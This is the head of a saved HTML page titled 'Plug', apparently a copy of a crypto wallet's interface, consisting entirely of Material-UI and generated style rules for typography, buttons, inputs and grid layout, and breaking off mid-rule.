<!DOCTYPE html>
<html lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><link rel="preconnect" href="https://fonts.gstatic.com/"><link href="./plugwallet_files/css2" rel="stylesheet"><title>Plug</title><link href="chrome-extension://cfbfdhimifdmdehjmkdobpcjfefblkjm/css/options.css?a8ffc085b8d6963b42c2" rel="stylesheet"><style data-jss="" data-meta="MuiCssBaseline">
html {
  box-sizing: border-box;
  -webkit-font-smoothing: antialiased;
  -moz-osx-font-smoothing: grayscale;
}
*, *::before, *::after {
  box-sizing: inherit;
}
strong, b {
  font-weight: 700;
}
body {
  color: rgba(0, 0, 0, 0.87);
  margin: 0;
  font-size: 0.875rem;
  font-family: Inter;
  font-weight: 400;
  line-height: 1.43;
  background-color: #fafafa;
}
@media print {
  body {
    background-color: #fff;
  }
}
body::backdrop {
  background-color: #fafafa;
}
.emoji-picker-react .emoji-categories {
  display: none;
}
</style><style data-jss="" data-meta="MuiButtonBase">
.MuiButtonBase-root {
  color: inherit;
  border: 0;
  cursor: pointer;
  margin: 0;
  display: inline-flex;
  outline: 0;
  padding: 0;
  position: relative;
  align-items: center;
  user-select: none;
  border-radius: 0;
  vertical-align: middle;
  -moz-appearance: none;
  justify-content: center;
  text-decoration: none;
  background-color: transparent;
  -webkit-appearance: none;
  -webkit-tap-highlight-color: transparent;
}
.MuiButtonBase-root::-moz-focus-inner {
  border-style: none;
}
.MuiButtonBase-root.Mui-disabled {
  cursor: default;
  pointer-events: none;
}
@media print {
  .MuiButtonBase-root {
    -webkit-print-color-adjust: exact;
  }
}
</style><style data-jss="" data-meta="MuiTypography">
.MuiTypography-root {
  margin: 0;
}
.MuiTypography-body2 {
  font-size: 0.875rem;
  font-family: Inter;
  font-weight: 400;
  line-height: 1.43;
}
.MuiTypography-body1 {
  font-size: 1rem;
  font-family: Inter;
  font-weight: 400;
  line-height: 1.5;
}
.MuiTypography-caption {
  color: #111827;
  font-size: 12px;
  font-family: Inter;
  font-weight: 400;
  line-height: 14.4px;
}
.MuiTypography-button {
  font-size: 0.875rem;
  font-family: Inter;
  font-weight: 500;
  line-height: 1.75;
  text-transform: uppercase;
}
.MuiTypography-h1 {
  color: #111827;
  font-size: 26px;
  font-family: Inter;
  font-weight: 700;
  line-height: 31.2px;
}
.MuiTypography-h2 {
  color: #111827;
  font-size: 22px;
  font-family: Inter;
  font-weight: 600;
  line-height: 26.4px;
}
.MuiTypography-h3 {
  color: #111827;
  font-size: 20px;
  font-family: Inter;
  font-weight: 600;
  line-height: 24px;
}
.MuiTypography-h4 {
  color: #111827;
  font-size: 18px;
  font-family: Inter;
  font-weight: 500;
  line-height: 21.6px;
}
.MuiTypography-h5 {
  color: #111827;
  font-size: 16px;
  font-family: Inter;
  font-weight: 500;
  line-height: 19.2px;
}
.MuiTypography-h6 {
  color: #374151;
  font-size: 14px;
  font-family: Inter;
  font-weight: 500;
  line-height: 16.8px;
}
.MuiTypography-subtitle1 {
  color: #374151;
  font-size: 16px;
  font-family: Inter;
  font-weight: 400;
  line-height: 19.2px;
}
.MuiTypography-subtitle2 {
  color: #374151;
  font-size: 14px;
  font-family: Inter;
  font-weight: 400;
  line-height: 16.8px;
}
.MuiTypography-overline {
  font-size: 0.75rem;
  font-family: Inter;
  font-weight: 400;
  line-height: 2.66;
  text-transform: uppercase;
}
.MuiTypography-srOnly {
  width: 1px;
  height: 1px;
  overflow: hidden;
  position: absolute;
}
.MuiTypography-alignLeft {
  text-align: left;
}
.MuiTypography-alignCenter {
  text-align: center;
}
.MuiTypography-alignRight {
  text-align: right;
}
.MuiTypography-alignJustify {
  text-align: justify;
}
.MuiTypography-noWrap {
  overflow: hidden;
  white-space: nowrap;
  text-overflow: ellipsis;
}
.MuiTypography-gutterBottom {
  margin-bottom: 0.35em;
}
.MuiTypography-paragraph {
  margin-bottom: 16px;
}
.MuiTypography-colorInherit {
  color: inherit;
}
.MuiTypography-colorPrimary {
  color: #3574F4;
}
.MuiTypography-colorSecondary {
  color: #f50057;
}
.MuiTypography-colorTextPrimary {
  color: rgba(0, 0, 0, 0.87);
}
.MuiTypography-colorTextSecondary {
  color: rgba(0, 0, 0, 0.54);
}
.MuiTypography-colorError {
  color: #f44336;
}
.MuiTypography-displayInline {
  display: inline;
}
.MuiTypography-displayBlock {
  display: block;
}
</style><style data-jss="" data-meta="makeStyles">
.jss13 {
  width: 32px;
  height: 45px;
}
.jss14 {
  width: 50px;
  height: 73px;
}
.jss15 {
  width: 80px;
  height: 116px;
}
.jss16 {
  position: relative;
}
.jss17 {
  top: 46px;
  right: -27px;
  z-index: 2;
  position: absolute;
}
.jss18 {
  top: 30px;
  left: 93px;
  color: #111827;
  width: max-content;
  padding: 9px 14px;
  z-index: 1;
  position: absolute;
  font-size: 14px;
  background: white;
  box-shadow: 0px 0px 0px rgb(6 44 82 / 10%), 0px 1px 3px rgb(64 66 69 / 12%), 0px 2px 16px rgb(33 43 54 / 8%);
  text-align: center;
  line-height: 16.8px;
  border-radius: 28px;
}
</style><style data-jss="" data-meta="MuiButton">
.MuiButton-root {
  color: rgba(0, 0, 0, 0.87);
  padding: 6px 16px;
  font-size: 0.875rem;
  min-width: 64px;
  box-sizing: border-box;
  transition: background-color 250ms cubic-bezier(0.4, 0, 0.2, 1) 0ms,box-shadow 250ms cubic-bezier(0.4, 0, 0.2, 1) 0ms,border 250ms cubic-bezier(0.4, 0, 0.2, 1) 0ms;
  font-family: Inter;
  font-weight: 500;
  line-height: 1.75;
  border-radius: 4px;
  text-transform: uppercase;
}
.MuiButton-root:hover {
  text-decoration: none;
  background-color: rgba(0, 0, 0, 0.04);
}
.MuiButton-root.Mui-disabled {
  color: rgba(0, 0, 0, 0.26);
}
@media (hover: none) {
  .MuiButton-root:hover {
    background-color: transparent;
  }
}
.MuiButton-root:hover.Mui-disabled {
  background-color: transparent;
}
.MuiButton-label {
  width: 100%;
  display: inherit;
  align-items: inherit;
  justify-content: inherit;
}
.MuiButton-text {
  padding: 6px 8px;
}
.MuiButton-textPrimary {
  color: #3574F4;
}
.MuiButton-textPrimary:hover {
  background-color: rgba(53, 116, 244, 0.04);
}
@media (hover: none) {
  .MuiButton-textPrimary:hover {
    background-color: transparent;
  }
}
.MuiButton-textSecondary {
  color: #f50057;
}
.MuiButton-textSecondary:hover {
  background-color: rgba(245, 0, 87, 0.04);
}
@media (hover: none) {
  .MuiButton-textSecondary:hover {
    background-color: transparent;
  }
}
.MuiButton-outlined {
  border: 1px solid rgba(0, 0, 0, 0.23);
  padding: 5px 15px;
}
.MuiButton-outlined.Mui-disabled {
  border: 1px solid rgba(0, 0, 0, 0.12);
}
.MuiButton-outlinedPrimary {
  color: #3574F4;
  border: 1px solid rgba(53, 116, 244, 0.5);
}
.MuiButton-outlinedPrimary:hover {
  border: 1px solid #3574F4;
  background-color: rgba(53, 116, 244, 0.04);
}
@media (hover: none) {
  .MuiButton-outlinedPrimary:hover {
    background-color: transparent;
  }
}
.MuiButton-outlinedSecondary {
  color: #f50057;
  border: 1px solid rgba(245, 0, 87, 0.5);
}
.MuiButton-outlinedSecondary:hover {
  border: 1px solid #f50057;
  background-color: rgba(245, 0, 87, 0.04);
}
.MuiButton-outlinedSecondary.Mui-disabled {
  border: 1px solid rgba(0, 0, 0, 0.26);
}
@media (hover: none) {
  .MuiButton-outlinedSecondary:hover {
    background-color: transparent;
  }
}
.MuiButton-contained {
  color: rgba(0, 0, 0, 0.87);
  box-shadow: 0px 3px 1px -2px rgba(0,0,0,0.2),0px 2px 2px 0px rgba(0,0,0,0.14),0px 1px 5px 0px rgba(0,0,0,0.12);
  background-color: #e0e0e0;
}
.MuiButton-contained:hover {
  box-shadow: 0px 2px 4px -1px rgba(0,0,0,0.2),0px 4px 5px 0px rgba(0,0,0,0.14),0px 1px 10px 0px rgba(0,0,0,0.12);
  background-color: #d5d5d5;
}
.MuiButton-contained.Mui-focusVisible {
  box-shadow: 0px 3px 5px -1px rgba(0,0,0,0.2),0px 6px 10px 0px rgba(0,0,0,0.14),0px 1px 18px 0px rgba(0,0,0,0.12);
}
.MuiButton-contained:active {
  box-shadow: 0px 5px 5px -3px rgba(0,0,0,0.2),0px 8px 10px 1px rgba(0,0,0,0.14),0px 3px 14px 2px rgba(0,0,0,0.12);
}
.MuiButton-contained.Mui-disabled {
  color: rgba(0, 0, 0, 0.26);
  box-shadow: none;
  background-color: rgba(0, 0, 0, 0.12);
}
@media (hover: none) {
  .MuiButton-contained:hover {
    box-shadow: 0px 3px 1px -2px rgba(0,0,0,0.2),0px 2px 2px 0px rgba(0,0,0,0.14),0px 1px 5px 0px rgba(0,0,0,0.12);
    background-color: #e0e0e0;
  }
}
.MuiButton-contained:hover.Mui-disabled {
  background-color: rgba(0, 0, 0, 0.12);
}
.MuiButton-containedPrimary {
  color: #fff;
  background-color: #3574F4;
}
.MuiButton-containedPrimary:hover {
  background-color: rgb(37, 81, 170);
}
@media (hover: none) {
  .MuiButton-containedPrimary:hover {
    background-color: #3574F4;
  }
}
.MuiButton-containedSecondary {
  color: #fff;
  background-color: #f50057;
}
.MuiButton-containedSecondary:hover {
  background-color: #c51162;
}
@media (hover: none) {
  .MuiButton-containedSecondary:hover {
    background-color: #f50057;
  }
}
.MuiButton-disableElevation {
  box-shadow: none;
}
.MuiButton-disableElevation:hover {
  box-shadow: none;
}
.MuiButton-disableElevation.Mui-focusVisible {
  box-shadow: none;
}
.MuiButton-disableElevation:active {
  box-shadow: none;
}
.MuiButton-disableElevation.Mui-disabled {
  box-shadow: none;
}
.MuiButton-colorInherit {
  color: inherit;
  border-color: currentColor;
}
.MuiButton-textSizeSmall {
  padding: 4px 5px;
  font-size: 0.8125rem;
}
.MuiButton-textSizeLarge {
  padding: 8px 11px;
  font-size: 0.9375rem;
}
.MuiButton-outlinedSizeSmall {
  padding: 3px 9px;
  font-size: 0.8125rem;
}
.MuiButton-outlinedSizeLarge {
  padding: 7px 21px;
  font-size: 0.9375rem;
}
.MuiButton-containedSizeSmall {
  padding: 4px 10px;
  font-size: 0.8125rem;
}
.MuiButton-containedSizeLarge {
  padding: 8px 22px;
  font-size: 0.9375rem;
}
.MuiButton-fullWidth {
  width: 100%;
}
.MuiButton-startIcon {
  display: inherit;
  margin-left: -4px;
  margin-right: 8px;
}
.MuiButton-startIcon.MuiButton-iconSizeSmall {
  margin-left: -2px;
}
.MuiButton-endIcon {
  display: inherit;
  margin-left: 8px;
  margin-right: -4px;
}
.MuiButton-endIcon.MuiButton-iconSizeSmall {
  margin-right: -2px;
}
.MuiButton-iconSizeSmall > *:first-child {
  font-size: 18px;
}
.MuiButton-iconSizeMedium > *:first-child {
  font-size: 20px;
}
.MuiButton-iconSizeLarge > *:first-child {
  font-size: 22px;
}
</style><style data-jss="" data-meta="MuiInputBase">
@-webkit-keyframes mui-auto-fill {}
@-webkit-keyframes mui-auto-fill-cancel {}
.MuiInputBase-root {
  color: rgba(0, 0, 0, 0.87);
  cursor: text;
  display: inline-flex;
  position: relative;
  font-size: 1rem;
  box-sizing: border-box;
  align-items: center;
  font-family: Inter;
  font-weight: 400;
  line-height: 1.1876em;
}
.MuiInputBase-root.Mui-disabled {
  color: rgba(0, 0, 0, 0.38);
  cursor: default;
}
.MuiInputBase-multiline {
  padding: 6px 0 7px;
}
.MuiInputBase-multiline.MuiInputBase-marginDense {
  padding-top: 3px;
}
.MuiInputBase-fullWidth {
  width: 100%;
}
.MuiInputBase-input {
  font: inherit;
  color: currentColor;
  width: 100%;
  border: 0;
  height: 1.1876em;
  margin: 0;
  display: block;
  padding: 6px 0 7px;
  min-width: 0;
  background: none;
  box-sizing: content-box;
  animation-name: mui-auto-fill-cancel;
  letter-spacing: inherit;
  animation-duration: 10ms;
  -webkit-tap-highlight-color: transparent;
}
.MuiInputBase-input::-webkit-input-placeholder {
  color: currentColor;
  opacity: 0.42;
  transition: opacity 200ms cubic-bezier(0.4, 0, 0.2, 1) 0ms;
}
.MuiInputBase-input::-moz-placeholder {
  color: currentColor;
  opacity: 0.42;
  transition: opacity 200ms cubic-bezier(0.4, 0, 0.2, 1) 0ms;
}
.MuiInputBase-input:-ms-input-placeholder {
  color: currentColor;
  opacity: 0.42;
  transition: opacity 200ms cubic-bezier(0.4, 0, 0.2, 1) 0ms;
}
.MuiInputBase-input::-ms-input-placeholder {
  color: currentColor;
  opacity: 0.42;
  transition: opacity 200ms cubic-bezier(0.4, 0, 0.2, 1) 0ms;
}
.MuiInputBase-input:focus {
  outline: 0;
}
.MuiInputBase-input:invalid {
  box-shadow: none;
}
.MuiInputBase-input::-webkit-search-decoration {
  -webkit-appearance: none;
}
.MuiInputBase-input.Mui-disabled {
  opacity: 1;
}
.MuiInputBase-input:-webkit-autofill {
  animation-name: mui-auto-fill;
  animation-duration: 5000s;
}
label[data-shrink=false] + .MuiInputBase-formControl .MuiInputBase-input::-webkit-input-placeholder {
  opacity: 0 !important;
}
label[data-shrink=false] + .MuiInputBase-formControl .MuiInputBase-input::-moz-placeholder {
  opacity: 0 !important;
}
label[data-shrink=false] + .MuiInputBase-formControl .MuiInputBase-input:-ms-input-placeholder {
  opacity: 0 !important;
}
label[data-shrink=false] + .MuiInputBase-formControl .MuiInputBase-input::-ms-input-placeholder {
  opacity: 0 !important;
}
label[data-shrink=false] + .MuiInputBase-formControl .MuiInputBase-input:focus::-webkit-input-placeholder {
  opacity: 0.42;
}
label[data-shrink=false] + .MuiInputBase-formControl .MuiInputBase-input:focus::-moz-placeholder {
  opacity: 0.42;
}
label[data-shrink=false] + .MuiInputBase-formControl .MuiInputBase-input:focus:-ms-input-placeholder {
  opacity: 0.42;
}
label[data-shrink=false] + .MuiInputBase-formControl .MuiInputBase-input:focus::-ms-input-placeholder {
  opacity: 0.42;
}
.MuiInputBase-inputMarginDense {
  padding-top: 3px;
}
.MuiInputBase-inputMultiline {
  height: auto;
  resize: none;
  padding: 0;
}
.MuiInputBase-inputTypeSearch {
  -moz-appearance: textfield;
  -webkit-appearance: textfield;
}
</style><style data-jss="" data-meta="MuiGrid">
.MuiGrid-container {
  width: 100%;
  display: flex;
  flex-wrap: wrap;
  box-sizing: border-box;
}
.MuiGrid-item {
  margin: 0;
  box-sizing: border-box;
}
.MuiGrid-zeroMinWidth {
  min-width: 0;
}
.MuiGrid-direction-xs-column {
  flex-direction: column;
}
.MuiGrid-direction-xs-column-reverse {
  flex-direction: column-reverse;
}
.MuiGrid-direction-xs-row-reverse {
  flex-direction: row-reverse;
}
.MuiGrid-wrap-xs-nowrap {
  flex-wrap: nowrap;
}
.MuiGrid-wrap-xs-wrap-reverse {
  flex-wrap: wrap-reverse;
}
.MuiGrid-align-items-xs-center {
  align-items: center;
}
.MuiGrid-align-items-xs-flex-start {
  align-items: flex-start;
}
.MuiGrid-align-items-xs-flex-end {
  align-items: flex-end;
}
.MuiGrid-align-items-xs-baseline {
  align-items: baseline;
}
.MuiGrid-align-content-xs-center {
  align-content: center;
}
.MuiGrid-align-content-xs-flex-start {
  align-content: flex-start;
}
.MuiGrid-align-content-xs-flex-end {
  align-content: flex-end;
}
.MuiGrid-align-content-xs-space-between {
  align-content: space-between;
}
.MuiGrid-align-content-xs-space-around {
  align-content: space-around;
}
.MuiGrid-justify-content-xs-center {
  justify-content: center;
}
.MuiGrid-justify-content-xs-flex-end {
  justify-content: flex-end;
}
.MuiGrid-justify-content-xs-space-between {
  justify-content: space-between;
}
.MuiGrid-justify-content-xs-space-around {
  justify-content: space-around;
}
.MuiGrid-justify-content-xs-space-evenly {
  justify-content: space-evenly;
}
.MuiGrid-spacing-xs-1 {
  width: calc(100% + 12px);
  margin: -6px;
}
.MuiGrid-spacing-xs-1 > .MuiGrid-item {
  padding: 6px;
}
.MuiGrid-spacing-xs-2 {
  width: calc(100% + 24px);
  margin: -12px;
}
.MuiGrid-spacing-xs-2 > .MuiGrid-item {
  padding: 12px;
}
.MuiGrid-spacing-xs-3 {
  width: calc(100% + 36px);
  margin: -18px;
}
.MuiGrid-spacing-xs-3 > .MuiGrid-item {
  padding: 18px;
}
.MuiGrid-spacing-xs-4 {
  width: calc(100% + 48px);
  margin: -24px;
}
.MuiGrid-spacing-xs-4 > .MuiGrid-item {
  padding: 24px;
}
.MuiGrid-spacing-xs-5 {
  width: calc(100% + 60px);
  margin: -30px;
}
.MuiGrid-spacing-xs-5 > .MuiGrid-item {
  padding: 30px;
}
.MuiGrid-spacing-xs-6 {
  width: calc(100% + 72px);
  margin: -36px;
}
.MuiGrid-spacing-xs-6 > .MuiGrid-item {
  padding: 36px;
}
.MuiGrid-spacing-xs-7 {
  width: calc(100% + 84px);
  margin: -42px;
}
.MuiGrid-spacing-xs-7 > .MuiGrid-item {
  padding: 42px;
}
.MuiGrid-spacing-xs-8 {
  width: calc(100% + 96px);
  margin: -48px;
}
.MuiGrid-spacing-xs-8 > .MuiGrid-item {
  padding: 48px;
}
.MuiGrid-spacing-xs-9 {
  width: calc(100% + 108px);
  margin: -54px;
}
.MuiGrid-spacing-xs-9 > .MuiGrid-item {
  padding: 54px;
}
.MuiGrid-spacing-xs-10 {
  width: calc(100% + 120px);
  margin: -60px;
}
.MuiGrid-spacing-xs-10 > .MuiGrid-item {
  padding: 60px;
}
.MuiGrid-grid-xs-auto {
  flex-grow: 0;
  max-width: none;
  flex-basis: auto;
}
.MuiGrid-grid-xs-true {
  flex-grow: 1;
  max-width: 100%;
  flex-basis: 0;
}
.MuiGrid-grid-xs-1 {
  flex-grow: 0;
  max-width: 8.333333%;
  flex-basis: 8.333333%;
}
.MuiGrid-grid-xs-2 {
  flex-grow: 0;
  max-width: 16.666667%;
  flex-basis: 16.666667%;
}
.MuiGrid-grid-xs-3 {
  flex-grow: 0;
  max-width: 25%;
  flex-basis: 25%;
}
.MuiGrid-grid-xs-4 {
  flex-grow: 0;
  max-width: 33.333333%;
  flex-basis: 33.333333%;
}
.MuiGrid-grid-xs-5 {
  flex-grow: 0;
  max-width: 41.666667%;
  flex-basis: 41.666667%;
}
.MuiGrid-grid-xs-6 {
  flex-grow: 0;
  max-width: 50%;
  flex-basis: 50%;
}
.MuiGrid-grid-xs-7 {
  flex-grow: 0;
  max-width: 58.333333%;
  flex-basis: 58.333333%;
}
.MuiGrid-grid-xs-8 {
  flex-grow: 0;
  max-width: 66.666667%;
  flex-basis: 66.666667%;
}
.MuiGrid-grid-xs-9 {
  flex-grow: 0;
  max-width: 75%;
  flex-basis: 75%;
}
.MuiGrid-grid-xs-10 {
  flex-grow: 0;
  max-width: 83.333333%;
  flex-basis: 83.333333%;
}
.MuiGrid-grid-xs-11 {
  flex-grow: 0;
  max-width: 91.666667%;
  flex-basis: 91.666667%;
}
.MuiGrid-grid-xs-12 {
  flex-grow: 0;
  max-width: 100%;
  flex-basis: 100%;
}
@media (min-width:600px) {
  .MuiGrid-grid-sm-auto {
    flex-grow: 0;
    max-width: none;
    flex-basis: auto;
  }
  .MuiGrid-grid-sm-true {
    flex-grow: 1;
    max-width: 100%;
    flex-basis: 0;
  }
  .MuiGrid-grid-sm-1 {
    flex-grow: 0;
    max-width: 8.333333%;
    flex-basis: 8.333333%;
  }
  .MuiGrid-grid-sm-2 {
    flex-grow: 0;
    max-width: 16.666667%;
    flex-basis: 16.666667%;
  }
  .MuiGrid-grid-sm-3 {
    flex-grow: 0;
    max-width: 25%;
    flex-basis: 25%;
  }
  .MuiGrid-grid-sm-4 {
    flex-grow: 0;
    max-width: 33.333333%;
    flex-basis: 33.333333%;
  }
  .MuiGrid-grid-sm-5 {
    flex-grow: 0;
    max-width: 41.666667%;
    flex-basis: 41.666667%;
  }
  .MuiGrid-grid-sm-6 {
    flex-grow: 0;
    max-width: 50%;
    flex-basis: 50%;
  }
  .MuiGrid-grid-sm-7 {
    flex-grow: 0;
    max-width: 58.333333%;
    flex-basis: 58.333333%;
  }
  .MuiGrid-grid-sm-8 {
    flex-grow: 0;
    max-width: 66.666667%;
    flex-basis: 66.666667%;
  }
  .MuiGrid-grid-sm-9 {
    flex-grow: 0;
    max-width: 75%;
    flex-basis: 75%;
  }
  .MuiGrid-grid-sm-10 {
    flex-grow: 0;
    max-width: 83.333333%;
    flex-basis: 83.333333%;
  }
  .MuiGrid-grid-sm-11 {
    flex-grow: 0;
    max-width: 91.666667%;
    flex-basis: 91.666667%;
  }
  .MuiGrid-grid-sm-12 {
    flex-grow: 0;
    max-width: 100%;
    flex-basis: 100%;
  }
}
@media (min-width:960px) {
  .MuiGrid-grid-md-auto {
    flex-grow: 0;
    max-width: none;
    flex-basis: auto;
  }
  .MuiGrid-grid-md-true {
    flex-grow: 1;
    max-width: 100%;
    flex-basis: 0;
  }
  .MuiGrid-grid-md-1 {
    flex-grow: 0;
    max-width: 8.333333%;
    flex-basis: 8.333333%;
  }
  .MuiGrid-grid-md-2 {
    flex-grow: 0;
    max-width: 16.666667%;
    flex-basis: 16.666667%;
  }
  .MuiGrid-grid-md-3 {
    flex-grow: 0;
    max-width: 25%;
    flex-basis: 25%;
  }
  .MuiGrid-grid-md-4 {
    flex-grow: 0;
    max-width: 33.333333%;
    flex-basis: 33.333333%;
  }
  .MuiGrid-grid-md-5 {
    flex-grow: 0;
    max-width: 41.666667%;
    flex-basis: 41.666667%;
  }
  .MuiGrid-grid-md-6 {
    flex-grow: 0;
    max-width: 50%;
    flex-basis: 50%;
  }
  .MuiGrid-grid-md-7 {
    flex-grow: 0;
    max-width: 58.333333%;
    flex-basis: 58.333333%;
  }
  .MuiGrid-grid-md-8 {
    flex-grow: 0;
    max-width: 66.666667%;
    flex-basis: 66.666667%;
  }
  .MuiGrid-grid-md-9 {
    flex-grow: 0;
    max-width: 75%;
    flex-basis: 75%;
  }
  .MuiGrid-grid-md-10 {
    flex-grow: 0;
    max-width: 83.333333%;
    flex-basis: 83.333333%;
  }
  .MuiGrid-grid-md-11 {
    flex-grow: 0;
    max-width: 91.666667%;
    flex-basis: 91.666667%;
  }
  .MuiGrid-grid-md-12 {
    flex-grow: 0;
    max-width: 100%;
    flex-basis: 100%;
  }
}
@media (min-width:1280px) {
  .MuiGrid-grid-lg-auto {
    flex-grow: 0;
    max-width: none;
    flex-basis: auto;
  }
  .MuiGrid-grid-lg-true {
    flex-grow: 1;
    max-width: 100%;
    flex-basis: 0;
  }
  .MuiGrid-grid-lg-1 {
    flex-grow: 0;
    max-width: 8.333333%;
    flex-basis: 8.333333%;
  }
  .MuiGrid-grid-lg-2 {
    flex-grow: 0;
    max-width: 16.666667%;
    flex-basis: 16.666667%;
  }
  .MuiGrid-grid-lg-3 {
    flex-grow: 0;
    max-width: 25%;
    flex-basis: 25%;
  }
  .MuiGrid-grid-lg-4 {
    flex-grow: 0;
    max-width: 33.333333%;
    flex-basis: 33.333333%;
  }
  .MuiGrid-grid-lg-5 {
    flex-grow: 0;
    max-width: 41.666667%;
    flex-basis: 41.666667%;
  }
  .MuiGrid-grid-lg-6 {
    flex-grow: 0;
    max-width: 50%;
    flex-basis: 50%;
  }
  .MuiGrid-grid-lg-7 {
    flex-grow: 0;
    max-width: 58.333333%;
    flex-basis: 58.333333%;
  }
  .MuiGrid-grid-lg-8 {
    flex-grow: 0;
    max-width: 66.666667%;
    flex-basis: 66.666667%;
  }
  .MuiGrid-grid-lg-9 {
    flex-grow: 0;
    max-width: 75%;
    flex-basis: 75%;
  }
  .MuiGrid-grid-lg-10 {
    flex-grow: 0;
    max-width: 83.333333%;
    flex-basis: 83.333333%;
  }
  .MuiGrid-grid-lg-11 {
    flex-grow: 0;
    max-width: 91.666667%;
    flex-basis: 91.666667%;
  }
  .MuiGrid-grid-lg-12 {
    flex-grow: 0;
    max-width: 100%;
    flex-basis: 100%;
  }
}
@media (min-width:1920px) {
  .MuiGrid-grid-xl-auto {
    flex-grow: 0;
    max-width: none;
    flex-basis: auto;
  }
  .MuiGrid-grid-xl-true {
    flex-grow: 1;
    max-width: 100%;
    flex-basis: 0;
  }
  .MuiGrid-grid-xl-1 {
    flex-grow: 0;
    max-width: 8.333333%;
    flex-basis: 8.333333%;
  }
  .MuiGrid-grid-xl-2 {
    flex-grow: 0;
    max-width: 16.666667%;
    flex-basis: 16.666667%;
  }
  .MuiGrid-grid-xl-3 {
    flex-grow: 0;
    max-width: 25%;
    flex-basis: 25%;
  }
  .MuiGrid-grid-xl-4 {
    flex-grow: 0;
    max-width: 33.333333%;
    flex-basis: 33.333333%;
  }
  .MuiGrid-grid-xl-5 {
    flex-grow: 0;
    max-width: 41.666667%;
    flex-basis: 41.666667%;
  }
  .MuiGrid-grid-xl-6 {
    flex-grow: 0;
    max-width: 50%;
    flex-basis: 50%;
  }
  .MuiGrid-grid-xl-7 {
    flex-grow: 0;
    max-width: 58.333333%;
    flex-basis: 58.333333%;
  }
  .MuiGrid-grid-xl-8 {
    flex-grow: 0;
    max-width: 66.666667%;
    flex-basis: 66.666667%;
  }
  .MuiGrid-grid-xl-9 {
    flex-grow: 0;
    max-width: 75%;
    flex-basis: 75%;
  }
  .MuiGrid-grid-xl-10 {
    flex-grow: 0;
    max-width: 83.333333%;
    flex-basis: 83.333333%;
  }
  .MuiGrid-grid-xl-11 {
    flex-grow: 0;
    max-width: 91.666667%;
    flex-basis: 91.666667%;
  }
  .MuiGrid-grid-xl-12 {
    flex-grow: 0;
    max-width: 100%;
    flex-basis: 100%;
  }
}
</style><style data-jss="" data-meta="makeStyles">
.jss9 {
  color: #111827;
  cursor: pointer;
  display: flex;
  font-size: 12px;
  align-items: center;
  font-weight: 700;
}
.jss10 {
  margin-left: 3px;
}
</style><style data-jss="" data-meta="makeStyles">
.jss31 {
  cursor: pointer;
  display: flex;
  align-items: center;
  flex-direction: row;
  justify-content: center;
}
.jss31:hover {
  opacity: 0.5;
}
.jss32 {
  width: 18px;
  height: 18px;
  padding-right: 9px;
}
.jss33 {
  color: #3574F4;
  font-size: 16px;
  text-align: center;
  font-weight: 500;
  line-height: 19.2px;
}
</style><style data-jss="" data-meta="makeStyles">
.jss21 {
  height: 42px;
  font-size: 16px;
  min-width: 130px;
  transition: transform 0.3s;
  line-height: 16px;
  border-radius: 10px;
  text-transform: none;
}
.jss21:hover, .jss21:active {
  transform: scale(1.03);
}
.jss22 {
  color: white;
  background: #3574F4;
  box-shadow: 0px 0px 0px rgba(6, 44, 82, 0.1), 0px 1px 3px rgba(64, 66, 69, 0.12), 0px 2px 16px rgba(33, 43, 54, 0.08);
  font-weight: 700;
}
.jss22:hover {
  opacity: 0.9;
  background: #3574F4;
  box-shadow: 0px 0px 0px rgba(6, 44, 82, 0.1), 0px 1px 3px rgba(64, 66, 69, 0.12), 0px 2px 16px rgba(33, 43, 54, 0.08);
}
.jss22:disabled {
  color: white;
  opacity: 0.6;
  background: #3574F4;
  box-shadow: 0px 0px 0px rgba(6, 44, 82, 0.1), 0px 1px 3px rgba(64, 66, 69, 0.12), 0px 2px 16px rgba(33, 43, 54, 0.08);
}
.jss23 {
  color: white;
  background: linear-gradient(94.95deg, #FFE701 -1.41%, #FA51D3 34.12%, #10D9ED 70.19%, #52FF53 101.95%);
  box-shadow: 0px 0px 0px rgba(6, 44, 82, 0.1), 0px 1px 3px rgba(64, 66, 69, 0.12), 0px 2px 16px rgba(33, 43, 54, 0.08);
  font-weight: 700;
}
.jss23:hover {
  opacity: 0.9;
  box-shadow: 0px 0px 0px rgba(6, 44, 82, 0.1), 0px 1px 3px rgba(64, 66, 69, 0.12), 0px 2px 16px rgba(33, 43, 54, 0.08);
}
.jss23:disabled {
  color: white;
  opacity: 0.6;
  box-shadow: 0px 0px 0px rgba(6, 44, 82, 0.1), 0px 1px 3px rgba(64, 66, 69, 0.12), 0px 2px 16px rgba(33, 43, 54, 0.08);
}
.jss24 {
  color: white;
  background: rgb(220, 38, 38);
  box-shadow: 0px 0px 0px rgba(6, 44, 82, 0.1), 0px 1px 3px rgba(64, 66, 69, 0.12), 0px 2px 16px rgba(33, 43, 54, 0.08);
  font-weight: 700;
}
.jss24:hover {
  opacity: 0.9;
  background: rgb(220, 38, 38);
  box-shadow: 0px 0px 0px rgba(6, 44, 82, 0.1), 0px 1px 3px rgba(64, 66, 69, 0.12), 0px 2px 16px rgba(33, 43, 54, 0.08);
}
.jss24:disabled {
  color: white;
  opacity: 0.6;
  background: rgb(220, 38, 38);
  box-shadow: 0px 0px 0px rgba(6, 44, 82, 0.1), 0px 1px 3px rgba(64, 66, 69, 0.12), 0px 2px 16px rgba(33, 43, 54, 0.08);
}
.jss25 {
  color: #374151;
  border: 1px solid #D1D5DB;
  box-shadow: 0px 1px 2px rgba(0, 0, 0, 0.05);
  font-weight: 500;
}
.jss25:hover {
  opacity: 0.9;
  box-shadow: 0px 1px 2px rgba(0, 0, 0, 0.05);
}
.jss25:disabled {
  opacity: 0.6;
  box-shadow: 0px 1px 2px rgba(0, 0, 0, 0.05);
}
.jss26 {
  color: #3775F4;
  border: 1px solid #3775F4;
  height: auto;
  padding: 4px 12px;
  font-size: 14px;
  min-width: auto;
  box-shadow: none;
  font-weight: 500;
  border-radius: 8px;
}
.jss26:hover {
  opacity: 0.9;
  box-shadow: none;
}
.jss26:disabled {
  opacity: 0.6;
  box-shadow: none;
}
.jss27 {
  color: #111827;
  border: double 2px transparent;
  box-shadow: none;
  background-clip: padding-box, border-box;
  background-image: linear-gradient(white, white), radial-gradient(circle at top left,#FFE701,#FA51D3,#10D9ED,#53FF54);
  background-origin: border-box;
}
.jss27:hover {
  opacity: 0.9;
  box-shadow: none;
}
.jss27:disabled {
  opacity: 0.6;
  box-shadow: none;
}
.jss28 {
  position: relative;
}
.jss29 {
  top: 50%;
  left: 50%;
  color: white;
  position: absolute;
  margin-top: -12px;
  margin-left: -12px;
}
.jss30 {
  width: 100%;
